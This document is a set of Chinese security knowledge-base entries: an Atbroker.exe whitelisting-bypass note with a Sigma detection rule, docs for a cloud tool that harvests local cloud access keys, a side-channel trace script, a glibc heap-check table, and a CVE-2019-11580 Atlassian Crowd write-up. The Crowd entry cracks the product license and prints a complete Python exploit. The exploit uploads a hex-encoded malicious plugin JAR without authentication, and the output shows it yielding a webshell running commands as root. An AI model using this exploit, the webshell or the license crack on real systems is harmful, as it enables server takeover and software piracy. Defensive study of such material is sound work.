# T1218-win-基于Atbroker.exe执行恶意载荷(白名单) ## 来自ATT&CK的描述 许多软件开发相关的实用程序可用于执行各种形式的代码用以协助开发、调试和逆向工程。这些实用程序通常可以使用合法证书进行签名。签名后,它们就可以在系统上执行,并通过可信的进程代理执行恶意代码,从而有效地绕过应用白名单防御解决方案。 ## 测试案例 atbroker.exe(C:\Windows\System32目录下),源于微软的“轻松访问中心”。”轻松访问中心”的一项功能是帮助用户启动辅助功能应用程序,常用的包括讲述人,屏幕键盘和放大镜。同时,这意味着第三方程序也可以通过注册“轻松访问中心”的方式来启动。 路径: ``` - C:\Windows\System32\Atbroker.exe - C:\Windows\SysWOW64\Atbroker.exe ``` 开始使用辅助技术 (AT) ``` ATBroker.exe /start malware ``` 用例:执行在注册表中为新 AT 定义的代码。 必须对系统注册表进行修改以注册或修改现有的 Assistibe Technology (AT) 服务条目。 所需权限:用户 操作系统:Windows 8、Windows 8.1、Windows 10 ## 检测日志 windows 安全日志(需要自行配置) ## 测试复现 ``` Microsoft Windows [版本 10.0.18363.418] (c) 2019 Microsoft Corporation。保留所有权利。 C:\Users\liyang> C:\Users\liyang>atbroker.exe /start malware ``` ### 测试环境 Windows 10 ## 测试留痕 ```log 已创建新进程。 创建者主题: 安全 ID: DESKTOP-PT656L6\liyang 帐户名: liyang 帐户域: DESKTOP-PT656L6 登录 ID: 0x47126 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x21e4 新进程名称: C:\Windows\System32\AtBroker.exe 令牌提升类型: %%1938 强制性标签: Mandatory Label\Medium Mandatory Level 创建者进程 ID: 0x24b4 创建者进程名称: C:\Windows\System32\cmd.exe 进程命令行: atbroker.exe  /start malware ``` ## 检测规则/思路 参考Sigma官方检测规则 ### sigma规则 ```yml title: Suspicious Atbroker Execution id: f24bcaea-0cd1-11eb-adc1-0242ac120002 description: Atbroker executing non-deafualt Assistive Technology applications references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ status: experimental author: Mateusz Wydra, oscd.community date: 2020/10/12 modified: 2021/08/14 tags: - attack.defense_evasion - attack.t1218 logsource: category: process_creation product: windows detection: selection: Image|endswith: 'AtBroker.exe' CommandLine|contains: 'start' filter: CommandLine|contains: - animations - audiodescription - caretbrowsing - caretwidth - colorfiltering - cursorscheme - filterkeys - focusborderheight - focusborderwidth - highcontrast - keyboardcues - keyboardpref - magnifierpane - messageduration - minimumhitradius - mousekeys - Narrator - osk - overlappedcontent - showsounds - soundsentry - stickykeys - togglekeys - windowarranging - windowtracking - windowtrackingtimeout - windowtrackingzorder condition: selection and not filter falsepositives: - Legitimate, non-default assistive technology applications execution level: high ``` ## 参考推荐 MITRE-ATT&CK-T1218 <https://attack.mitre.org/techniques/T1218> Atbroker.exe <https://lolbas-project.github.io/lolbas/Binaries/Atbroker/> ATBroker.exe:一个被病毒利用的微软进程 <https://www.freebuf.com/articles/system/171437.html>
sec-knowleage
--- title: 配置与管理凭证 --- ## 配置凭证 CF 支持两种配置访问凭证的方法,一种是利用永久的访问凭证去配置,一种是利用临时的访问凭证去配置。 ### 配置凭证 ```bash cf config ``` 在配置凭证的时候 `Access Key ID` 和 `Access Key Secret` 参数是必填的,只有当配置临时访问凭证时,才需要填 `STS Token` 参数。 > 配置文件被会存储在 `~/.config/cf/cache.db` 中 在 v0.4.3 版本中,对 config 命令加入了自动识别本地访问密钥的功能,当用户在配置访问密钥的时候,CF 会自动识别本地是否存在访问密钥,如果存在的话,则会提示用户是否将其导入到 CF,CF 所识别的文件地址和环境变量如下: | 云提供商 | 类型 | 对象 | | :------: | :------: | :----------------------------------------------------------: | | 阿里云 | 配置文件 | ~/.aliyun/config.json | | 阿里云 | 环境变量 | ALIBABACLOUD_ACCESS_KEY_ID, ALIBABACLOUD_ACCESS_KEY_SECRET, SECURITY_TOKEN | | 腾讯云 | 配置文件 | ~/.tccli/*.credential | | 腾讯云 | 环境变量 | TENCENTCLOUD_SECRET_ID, TENCENTCLOUD_SECRET_KEY | | AWS | 配置文件 | ~/.aws/credentials | | AWS | 环境变量 | AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN | | 华为云 | 配置文件 | ~/.huaweicloud/credentials | | 华为云 | 环境变量 | HUAWEICLOUD_SDK_AK, HUAWEICLOUD_SDK_SK, HUAWEICLOUD_SDK_SECURITY_TOKEN | | 华为云 | 环境变量 | OBS_ACCESS_KEY_ID, OBS_SECRET_ACCESS_KEY, OBS_SECURITY_TOKEN | ### 删除凭证 ```bash cf config del ``` ### 查看凭证 ```bash cf config ls ``` 使用 ls 命令列出配置的时候,如果配置内容过长,这时输出内容会进行部分省略展示,如果想列出凭证的全部内容,可以使用 `-a` 或者`--all`命令。 ``` cf config ls -a ``` ### 修改配置 ```bash cf config mf ``` ### 扫描本地配置 ```bash cf config scan ``` ### 切换配置 ```bash cf config sw ``` ### 查询配置所属云厂商 目前已支持腾讯云、阿里云、AWS、华为云、百度云、火山引擎、金山云、京东云、GCP、七牛云、UCloud 的 AK 识别。 ```bash cf config query -a <your_access_key_id> ``` `-a` 参数用来指定 Access Key Id,该参数是必填的,当只填该参数时会仅通过正则判断所属云厂商。 如果加上了 `-s` 参数指定 Secret Access Key ,或者同时加上了 `-t` 参数指定 Session Token ,则除了会调用正则外,还会调用相关接口用来判断 AK 是否可用,从而能更准确的判断 AK 所属厂商。 <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2023 年 7 月 1 日" } } </script>
sec-knowleage
from library import * from lib_attack import * import sys import numpy as np inputs, outputs, traces = parse(sys.argv[1], left=650000, right=700000) normalize(traces) smooth(traces, 25) align(traces, range(-5000, 15000)) if 1: traces = traces[:,0:40000] normalize(traces) align(traces, range(-50, 50)) if 0: traces = traces[:, 8000:9500] normalize(traces) align(traces, range(-20, 20)) save_traces(sys.argv[2], inputs, outputs, traces)
sec-knowleage
# Atlassian Crowd 未授权访问漏洞 > CVE-2019-11580 ## 漏洞概述 Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了了pdkinstall开发插件,使其存在安全漏漏洞洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限 ## 影响版本 * 2.1.0 <= version < 3.0.5 * 3.1.0 <= version < 3.1.6 * 3.2.0 <= version < 3.2.8 * 3.3.0 <= version < 3.3.5 * 3.4.0 <= version < 3.4.4 ## 环境搭建 下载搭建Atlassian-crowd-3.4.3,配置漏洞环境,下载crowd3.4.3的版本 ``` wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip ``` 修改配置文件 ``` [root@localhost atlassian-crowd-3.4.3]# pwd /opt/atlassian-crowd-3.4.3 [root@localhost atlassian-crowd-3.4.3]# vim crowd-webapp/WEB-INF/classes/crowd-init.properties ``` 更改主目录的路径 ![image-20220726121537863](../../.gitbook/assets/image-20220726121537863.png) 启动crowd ``` [root@localhost atlassian-crowd-3.4.3]# sh start_crowd.sh To run Crowd in the foreground, start the server with start_crowd.sh -fg Using CATALINA_BASE: /opt/atlassian-crowd-3.4.3/apache-tomcat Using CATALINA_HOME: /opt/atlassian-crowd-3.4.3/apache-tomcat Using CATALINA_TMPDIR: /opt/atlassian-crowd-3.4.3/apache-tomcat/temp Using JRE_HOME: /usr Using CLASSPATH: /opt/atlassian-crowd-3.4.3/apache-tomcat/bin/bootstrap.jar:/opt/atlassian-crowd-3.4.3/apache-tomcat/bin/tomcat-juli.jar Using CATALINA_PID: /opt/atlassian-crowd-3.4.3/apache-tomcat/work/catalina.pid Tomcat started. ``` 访问8095端口 ![image-20220726121716750](../../.gitbook/assets/image-20220726121716750.png) 得到服务器 id **`B1DP-2T7V-FIPR-PEBO`** 后通过破解程序`atlassian-agent.jar`获取许可证信息 ![image-20220726121749173](../../.gitbook/assets/image-20220726121749173.png) 生成破解码 ``` [root@localhost tmp]# java -jar /opt/atlassian/atlassian-agent.jar -d -m test@test.com -n test.cn -p crowd -o http://192.168.32.183:8095 -s B1DP-2T7V-FIPR-PEBO ==================================================== ======= Atlassian Crack Agent v1.3.1 ======= ======= https://zhile.io ======= ======= QQ Group: 30347511 ======= ==================================================== Your license code(Don't copy this line!!!): AAABoQ0ODAoPeJxtUU1v4jAUvPtXRNpzgh1KPpAsbZsYLd18LdAeuJnwaLwkDnIcCvz6JiRopVUvt jRjv5k382PTgvHalobtGBjPiT/HrsHCjWFj20aBAq5FLUOugfaIiV3TdhA787K9M/TAywZQCE2ux OmOvMlSVELD3ihFDrIBY3c1Cq1PzXwyuRWiBEvUKFUfXIpmGNKzHUl82yKOZ027y5vOPezPUK7qz 70VDZM21xMkvAIapHHMVsHyORofrDVXGtRoJ6il5rlmMRcl1dDon/1h5XWFRk+/eFPQOPgMFiE5y lqz/Xa2Za/xkXHnskicJ3ebV8/FH5Jx6YC6pW01+ZveDgW/2NHNW11+f1CKuvlSg+QyB3Y5CXUdg /L8PijsotH3MqTRMlyzxIyIM/O6xciTS3xvNN9ZFWegWrWA1qDOoLoPLyTMTHvjvpuLZbYyM/aSo iNc30E1fWTEwdjF3nRKHiLfO8halRe8gf8rHJQ7lAcg++Tu6gOatNUOVHp4azoxapJHaA9tG63b3 b/CB98sod8sODZxL23oQH4BfpvL4jAsAhQt6OiEcmsu5eD6OZo5HBm8DIwpLwIUN7XS/JQ44Zrlu tReQFf42Id/W0E=X02k4 ``` 安装完成 ![image-20220726122116609](../../.gitbook/assets/image-20220726122116609.png) ## 漏洞利用 CVE-2019-11580.py利用脚本 ``` import requests import sys banner = '''\n _______ ________ ___ ___ __ ___ __ __ _____ ___ ___ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____|/ _ \ / _ \ | | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | (_) | | | | | | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ > _ <| | | | | |____ \ / | |____ / /_| |_| || | / / | || |___) | (_) | |_| | \_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ \___/ \___/ \n python CVE-2019-11580.py http://xx.xx.xx.xx\n ''' print banner def is_url(url): upload_url = url + "/crowd/admin/uploadplugin.action" r = requests.get(upload_url, verify=False) if r.status_code==400: print upload_url send_poc(url) else: print "No Exit /crowd/admin/uploadplugin.action !" def send_poc(url): url_vuln = url + "/crowd/admin/uploadplugin.action" headers = { 'User-Agent': 'curl/7.29.0', 'Accept': '*/*', 'Content-Length': '5739', 'Expect': '100-continue', 'Content-Type': 'multipart/mixed; boundary=----------------------------f15fe87e95a7' } s ="2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d6631356665383765393561370d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c655f63646c223b2066696c656e616d653d227263652e6a6172220d0a436f6e74656e742d547970653a206170706c69636174696f6e2f6f637465742d73747265616d0d0a0d0a504b03041400000008007c7ef14e544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c55540900039bd32e5da8d32e5d75780b0001040000000004000000007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a00000000001b7ff14e00000000000000000000000004001c00636f6d2f5554090003c6d42e5dc9d42e5d75780b000104000000000400000000504b03040a00000000001b7ff14e00000000000000000000000008001c00636f6d2f63646c2f5554090003c6d42e5dc9d42e5d75780b000104000000000400000000504b03040a0000000000d07df14e0000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f555409000357d22e5d59d22e5d75780b000104000000000400000000504b03041400000008008878f14ec2481cb07d0100008d03000016001c00636f6d2f63646c2f7368656c6c2f43646c2e6a61766155540900036fc82e5dbdc82e5d75780b0001040000000004000000008d934d4fc3300c86effd15a617523e22384f3d21049c400c890b97909a35903621714711da7fc75187e8b60ee14395da799fbcb15baff49b5a2068d7485d59196bb4769665a6f12e10bcaaa5ea65c4b0b448b226f2f268362e4ae3e44deb3b9a5340d5b0d277cfd668d056c508179505ec09db2a4eb1aef9311f12f09565c0b1962f9da9a072574862b4e91edf3b8c0401df4f60231fbd6b237221164c827550f81cbda5609ba65d806eaa7258caa5b21ddebe0866ca05d29d0aaa41c220f28ba6ca8b6236a5771df19dcb3cdfacee9e97c2bc8038e01325bb57368a9ca913db52dc05a791fbe6cbfbae25d360b2b45e8a42628f5a3069cbd44f8c06911c963ea94749f10f1d8630e82e4370e16f9d69097479f87476385dffa88d45104297ec4632a9127cf383124ecff73520050f3119780c268da1901f69c1945a8542efb1b2dac96e6656a015e95a5cf61a3d19d7f26739e56118ec71993fb5f931f692dc30f1ed16fcd227c8db60949e19dc61fed91e82d238a60da45596adb26f504b030414000000080085b2f04ecafaf82fe50000000418000017001c00636f6d2f63646c2f7368656c6c2f2e44535f53746f726555540900031add2d5d09df2d5d75780b000104000000000400000000ed98316ec2401045ff382e564ab365ca2da922e5062b0305752e100815b2e42aa95d71176ec1cdc0667e0292b1945444e13f69f40acf8cd7cdee8e0158f5b17e0122800037b6b84a600c2868f3e87a6cb0c427968bba79bfde6b809d9a4fb1468de7cbfa55ddacb8b05d1793c3891f7615420821c418e60a8fb75d8610e20fd2ef0f89ce74eb363e2fe8f2a226d289ce74eb36e6157449073ad289ce74ebe6a6651c3e8c6f364e2816e944e75f7db21077c3832bf6e7ff1ca3f3bf10e21f63e5ec7556e17b2018d09fb5a98b37e6ecbf0a472e0285ff307cc2392fd1996eddba0c08710b8e504b0304140000000800b178f14ed0054a4648030000fa05000017001c00636f6d2f63646c2f7368656c6c2f43646c2e636c6173735554090003bdc82e5d09df2d5d75780b0001040000000004000000008d545d7b1345147e274d32dbedf62ba594fa010202295016152b2608d852a05ad2d214b0f8b9dd8c6571b39b6e26b5fa33bcf4c6cb5e7313409fc71fe02ff12f78637d674925ad7da479f63967e6cc39ef79cf999cf9e3ef5f7f077009be8d31142d4cf4e12cced9388f490b178c766d5cc43b46bc6be33d5c32e27d1b53f8a00f97f1a18d12ca1257243eb23188a211572d5cb33180eb6673ddac3e9698969811c85f09a2405f15e8294edc17c8cec4352530381f44aad2aaafaa64d95b0d69c9d5e25b4a0b2c15e71f7b1bdea6db54c946a8b4fb48eb867b9ba2fac2b0a4d65baaa9cbaf746b36e2a8a9ca266b7f557bfe7777bc469a2ca576436256e2a6c42d89db2c47c0aec6adc457370343c79aa985174c060747304ef633f51a831ccce1138639f814f302707007158905078bb8eb600955023a58c63d07f7718fd00e1ee033e672b08287129f3bf8025f0a8c186c37f4a2357776d3570d1dc491c0d84b6b552741b436dd0ac29a4a1c7c85af0584ede01b90d2aaa134ecc775d7af856ef3910a439784058efe7f53044e1da8b902a70fd65d81a1bd9449eca56931897dd56ceed41bc4ee5cd468697a2aaf2ee0ac29bde8255e5d699530e98bbbef462b4ffcd7242037bcb0a516bedd13b2b0fa58f97aff903c2bf3423219dd2fe2e12ed64bad480775166793dfbf9bd1623770c74ce4acda54bec0995790efb482010344ddd586b11de4ddfde9b8ce26499cecb866a96ae930cd09f4f2f44112a4bdebc65864f2ce41b9abf55d66cedbf76641c0e29c9990bcd768a888c89307ba83ceff92e8968e77eefd5071dfce0f364cde74029713cf57388ec37c7bcc2f0361c68bf235eedea4e64c2177f629c4132e045ea7cca74623df485de82a8a0ceda5f5c77385cc73f464f00cd94a2157ca4e16726de47fc6e56790936d58a5dc380dbda5bc517649f64c59e3f936fa56a6accc2f289c7f0e87376bfdd446ffd6f69f5b3859cafd86c195a7181acfb6315c285098d011ea360e95b25bb02a041e7d420643a8e02e1f3b601d9a3a93f29da61db0f936f471d5cff2067082efe204771731ccd7b4806b1861ec11461f4695cd5867a4a6678bd5fdc03a8f12e106f2db74ee953826f196c4718913e97752e26d7eecca36dd737bce615eb7537fe1985159f6eb74dae833ff00504b030414000000080080b2f04e5e4c2ce8970100000418000011001c00636f6d2f63646c2f2e44535f53746f726555540900030fdd2d5dc8c82e5d75780b000104000000000400000000ed98cf4e833018c0bf32a61063e460e28e5c4c3cecb0c5cd1d8c09c179d8cd04a387693618c491205d06932862780d7d239fc0c751fe7c1ad0ede06953fb4b9a5f295f5b0aa4a500005167661340020001727322cc45c0f40d0ecd2789646d383d878e0c871af35b62ac1ce9b3ab820763b0c0293dbff495384cd2de5b46165d8834026f82912fc6c4b13dbfd178255c85afaead0ba228889be29536a681e6ebfecc53f5693f3d3ad5fdb181f9334a9dcfbc6e9cdb563090b68fa9ebebb66b4db3cab66925219717b66bd240a533d7f4fa8513594703a91686ad76bb2eb7daada82e879d4e23c9ef1f449128ecec368f7ac39bbbfbf0217a7ccac74c080e7eebcbcd782e0fd1f4468e915c242917df6a53d7a1ee35646f3d83c160fc4270f61236967b190c06630549e70719ada0e3dc04cf7368be504742cb68051de72618c7a179b48096d0325a41c7b971d222b8f920d833c11d0a91d0325af9d190198c7f43259794aeff278bf7ff0c06e30f43f8aed65561f1ef8c74ad959334fca800e50f012ce331365d8a6b857219ada0e3dcec4380c15816ef504b030414000000080080b2f04e7261dc5f94010000041800000d001c00636f6d2f2e44535f53746f726555540900030fdd2d5dc8c82e5d75780b000104000000000400000000ed98cf4e833018c0bf32548831723071472e261e76d8e2e60ec684e03cec6632a3876936188b2341ba0c2651c4f01afa463e818fa3fcf9749bba83a7e9fc7e49f32be52b6d81b4140060fad8aa00280020416e41866f91307d41408b4962e93578cf74b8899723fe02e9b32b400f2c709aceccf33b48d2ee6b4616895166e00d31ead91c3ab6e797cb2f4c28882bab6b922c4bf2867cd91af0a0e51bfed8d38d513b3d3a31fc8189f953ce9d8fbc619ed9fda0a36c1d71d7376cb73fca2adb563f09b938b75d8b073a1fbb96d79e3a9135d4518a6158add54a6ab5568d4a6a58af9793fcde7e14c9d2f64ee5b0d9bdbebd0befa387c77cac8ce1a0373fdd84a7c9f02cafe7984907d9a4e8a635721dee5e41f6961304412c01389b49eb8bed064110bf90747e50d11a3acecdf0bc8016a7ea286815ada1e3dc0ce304b48896d00a5a456be838374e5a0c371f0c5b66b84361b8f5602a5afbd19009e2df50c8a5a4ebfff1fcfd3f41104b0c131bad860ef37f6fa46bad9aa4ee7b0598fd10c0321163d3a5b83855aea235749c9b3e04086251bc01504b0304140000000800b57df14ef98bc46d88010000c303000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000326d22e5d57d22e5d75780b0001040000000004000000008d53c14ee33010bde72b865c702818f65cf98880130856e2c2c5eb0c8dc1898d3d2941abfe3b63d2d5a66d58ed93123933f39edf4ceca0cdab5e2118df4a533b991a746e5914b60d3e12bce8b51e64c2b87648b2210af264394d4aebe54d177a7aa088ba6566e87f396bc0389d12e010f821ecea34a775cdaf873100bf8b02185bfadadb1a6a7f85242645f7f8d6632288f8760a3bf1147c979013a96225d882e2c7e42b836dda6e05a6add5b8946bed7abc7d16ac295748773aea1609a328b9a8acaae51cdff7c43dabb2dccd9e9fb381acf2186d96a8e47b5e7c492946098bbcf59ee6a1cb0cfb0ce2888b25f7ac5d12257b9929cbb88bde204f3ba8fbbe23db62b6b05db2071cd088c36dff60f2fb725f2a64f62428fe8387318ebccb187dfc37cf7604461d3f5d1ccfe7df1beb1084308add4856aa05777ea4e0ecc77703c8989fbc308d8e95f9c6cae620ba1bd980d1641a7139180c647dc78779cec3781c16aa7ceaca050e92fc784ef647f0577d46795f1865600d9e305fd19f511b9caa8d4a9ba2d8149f504b03041400000008005a7ff14e3ac5f9ef48030000fa05000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c61737355540900033bd52e5da8d32e5d75780b0001040000000004000000008d54db76d34614dde3d81e451171e2244ddd0b1428e00041bdd094da14682040dae084385c02f4a2c8d3202a4b8a2ca7693fa38f7de9639e793197aed50fe897f417fad2748f708a936641bcb4ce191d9db3cf3e7b3cf3e73fcfff007016ae8971940d4c0ce0244e99388d490367b4b74d7c800fb5f9c8c4c738abcd2726a6f0e900cee13313155425ce4b7c6ea280b236170c5c3431884bfae5925e7d21312d7159207fde0bbce482405f79e2b640f672d8500285392f50b5767345c54bce8acf48ae115e5389c06279ee91b3ee6cd82d15affb2ab11f2649645fa7a9bf082caab5b66a25d5d7a6b5a23068a9aaee7aa09e38ee0f379c286d9652bb2231237155e29ac4758e2360d6c376ecaaab9ea663a88de88cee60e14d94c8de6d36586461165fb2ccc257981380851ba849cc5b58c04d0b8ba813d0c2126e59b88d5b84b6700777d9cbc232ee49dcb7f0005f0b8c686cdb7782557b66c35551e28581c0f8cb683d89bd6075baedf90d155bf806df0a08d3c27720a5154d69d80d9bb6dbf0edd643e5fb36090b1c7cb52802c7f625aec0f1fda92b30b49b3289bd0c2dc4a1ab5aaded79bdd09e0da276c24ce53405ac55952c38b1d354898ad9f4c5def7a25527fe1f1290eb8edf56f3dfef2a995f79a4dc64ef923c27737c3219dbabe2de0ed68bed20f19a1cce24bfff5ec6cabdc0dd3091b36a43b902275e43be2b050b0689ba4386f16de49dfa745367e2388cb753b3748df430cd0af4f3eb9dd84bb5ebc55860f3ee876a8ff43d619eb71ff58280e5597d42f24e14a980c893fbda83eeff92e846126eeffb68794fe50b91ee9b9ec0a5d871150ee30dde3dfa9781d0c78bf62dbebd4bcf3385dcc927108fb910789b369f06b57d274d61aa28b3b49fd19f4f1533cfd097c153646bc55c253b59cc7590ff15e79e424e766054722506fa2b79edcc8aec9b324af90e0696a78ccc6f289e7e068b3b6bfcd2c181cdadbf3671b492fb1d85e527182a653b182e166974e9087d07a395ec268c1a81c71e93c1106ab8c9cb0e5843429f49f94e330e98bc1b06b81ae478051ce16a02c3bc538bbc4d477011a3ac2db17a1c754ab0c6d9124ed626c24f9cf22011ae20bfc5e47e894312ef491c9638923e4725dee74355b65892dbf51dfa763bf6370e6997a55ec753a14ffc0b504b01021e031400000008007c7ef14e544c2527eb00000004020000140018000000000001000000ed810000000061746c61737369616e2d706c7567696e2e786d6c55540500039bd32e5d75780b000104000000000400000000504b01021e030a00000000001b7ff14e000000000000000000000000040018000000000000001000ed4139010000636f6d2f5554050003c6d42e5d75780b000104000000000400000000504b01021e030a00000000001b7ff14e000000000000000000000000080018000000000000001000ed4177010000636f6d2f63646c2f5554050003c6d42e5d75780b000104000000000400000000504b01021e030a0000000000d07df14e0000000000000000000000000e0018000000000000001000ed41b9010000636f6d2f63646c2f7368656c6c2f555405000357d22e5d75780b000104000000000400000000504b01021e031400000008008878f14ec2481cb07d0100008d030000160018000000000001000000ed8101020000636f6d2f63646c2f7368656c6c2f43646c2e6a61766155540500036fc82e5d75780b000104000000000400000000504b01021e0314000000080085b2f04ecafaf82fe500000004180000170018000000000000000000a481ce030000636f6d2f63646c2f7368656c6c2f2e44535f53746f726555540500031add2d5d75780b000104000000000400000000504b01021e03140000000800b178f14ed0054a4648030000fa050000170018000000000000000000a48104050000636f6d2f63646c2f7368656c6c2f43646c2e636c6173735554050003bdc82e5d75780b000104000000000400000000504b01021e0314000000080080b2f04e5e4c2ce89701000004180000110018000000000000000000a4819d080000636f6d2f63646c2f2e44535f53746f726555540500030fdd2d5d75780b000104000000000400000000504b01021e0314000000080080b2f04e7261dc5f94010000041800000d0018000000000000000000a4817f0a0000636f6d2f2e44535f53746f726555540500030fdd2d5d75780b000104000000000400000000504b01021e03140000000800b57df14ef98bc46d88010000c3030000160018000000000001000000a4815a0c0000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000326d22e5d75780b000104000000000400000000504b01021e031400000008005a7ff14e3ac5f9ef48030000fa050000170018000000000000000000a481320e0000636f6d2f63646c2f7368656c6c2f6578702e636c61737355540500033bd52e5d75780b000104000000000400000000504b0506000000000b000b00bf030000cb11000000000d0a2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d6631356665383765393561372d2d0d0a" data = s.decode("hex") r = requests.post(url=url_vuln, headers=headers, data=data, verify=False) if r.status_code ==200 and "Installed" in r.content: print print r.content getwebshell(url) else: print "No Exit!" def getwebshell(url): webshell_url = url + "/crowd/plugins/servlet/exp?cmd=whoami" r = requests.get(webshell_url, verify=False) if r.status_code==200: print ">>>Get Webshell\n" print webshell_url+'\n' print "Exec command= whoami\n\nResult= %s"%r.text if __name__ == '__main__': url = sys.argv[1] is_url(url) ``` ``` [root@localhost CVE-2019-11580-master]# python CVE-2019-11580.py http://192.168.32.183:8095 _______ ________ ___ ___ __ ___ __ __ _____ ___ ___ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____|/ _ \ / _ \ | | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | (_) | | | | | | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ > _ <| | | | | |____ \ / | |____ / /_| |_| || | / / | || |___) | (_) | |_| | \_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ \___/ \___/ python CVE-2019-11580.py http://xx.xx.xx.xx http://192.168.32.183:8095/crowd/admin/uploadplugin.action Installed plugin /opt/atlassian-crowd-3.4.3/apache-tomcat/temp/plugindev-7114709723171005763rce.jar >>>Get Webshell http://192.168.32.183:8095/crowd/plugins/servlet/exp?cmd=whoami Exec command= whoami Result= root ``` 然后访问获取的shell地址,无需认证登录即可获取IP地址。 ![image-20220726122817754](../../.gitbook/assets/image-20220726122817754.png)
sec-knowleage
# 堆中的检查 ## _int_malloc ## 初始检查 | 检查目标 | 检查条件 | 信息 | | :---: | :--------------------------------------: | :-----------------: | | 申请的大小 | REQUEST_OUT_OF_RANGE(req) :((unsigned long) (req) >= (unsigned long) (INTERNAL_SIZE_T)(-2 * MINSIZE)) | __set_errno(ENOMEM) | ### fastbin | 检查目标 | 检查条件 | 报错信息 | | -------- | :-------------------------------------: | :--------------------------------: | | chunk 大小 | fastbin_index(chunksize(victim)) != idx | malloc(): memory corruption (fast) | ### Unsorted bin | 检查目标 | 检查条件 | 报错信息 | | :-------------------: | :--------------------------------------: | :-------------------------: | | unsorted bin chunk 大小 | chunksize_nomask (victim) <= 2 * SIZE_SZ \|\| chunksize_nomask (victim) av->system_mem | malloc(): memory corruption | ### top chunk | 检查目标 | 检查条件 | 信息 | | :------------: | :--------------------------------------: | :--: | | top chunk size | (unsigned long) (size) >= (unsigned long) (nb + MINSIZE) | 方可进入 | ## __libc_free ### mmap 块 | 检查目标 | 检查条件 | 信息 | | :------------: | :------------------: | :--: | | chunk size 标记位 | chunk_is_mmapped (p) | 方可进入 | ### 非mmap 块 ## __int_free ### 初始检查 | 检查目标 | 检查条件 | 报错信息 | | :--------: | :--------------------------------------: | :---------------------: | | 释放chunk位置 | (uintptr_t) p > (uintptr_t) -size \|\| misaligned_chunk(p) | free(): invalid pointer | | 释放chunk的大小 | size < MINSIZE \|\| !aligned_OK(size) | free(): invalid size | ### fastbin | 检查目标 | 检查条件 | 报错信息 | | :-------------------: | :--------------------------------------: | :---------------------------------: | | 释放chunk的下一个chunk大小 | chunksize_nomask(chunk_at_offset(p, size)) <= 2 * SIZE_SZ, chunksize(chunk_at_offset(p, size)) >= av->system_mem | free(): invalid next size (fast) | | 释放 chunk对应链表的第一个chunk | fb = &fastbin(av, idx),old= *fb, old == p | double free or corruption (fasttop) | | fastbin索引 | old != NULL && old_idx != idx | invalid fastbin entry (free) | ### non-mmapped 块检查 | 检查目标 | 检查条件 | 报错信息 | | :-----------: | :--------------------------------------: | :--------------------------------: | | 释放chunk位置 | p == av->top | double free or corruption (top) | | next chunk 位置 | contiguous (av) && (char *) nextchunk >= ((char *) av->top + chunksize(av->top)) | double free or corruption (out) | | next chunk 大小 | chunksize_nomask (nextchunk) <= 2 * SIZE_SZ \|\| nextsize >= av->system_mem | free(): invalid next size (normal) | ## unlink | 检查目标 | 检查条件 | 报错信息 | | :-------------------: | :--------------------------------------: | :--------------------------------------: | | size **vs** prev_size | chunksize(P) != prev_size (next_chunk(P)) | corrupted size vs. prev_size | | Fd, bk 双向链表检查 | FD->bk != P \|\| BK->fd != P | corrupted double-linked list | | nextsize 双向链表 | P->fd_nextsize->bk_nextsize != P \|\| P->bk_nextsize->fd_nextsize != P | corrupted double-linked list (not small) |
sec-knowleage
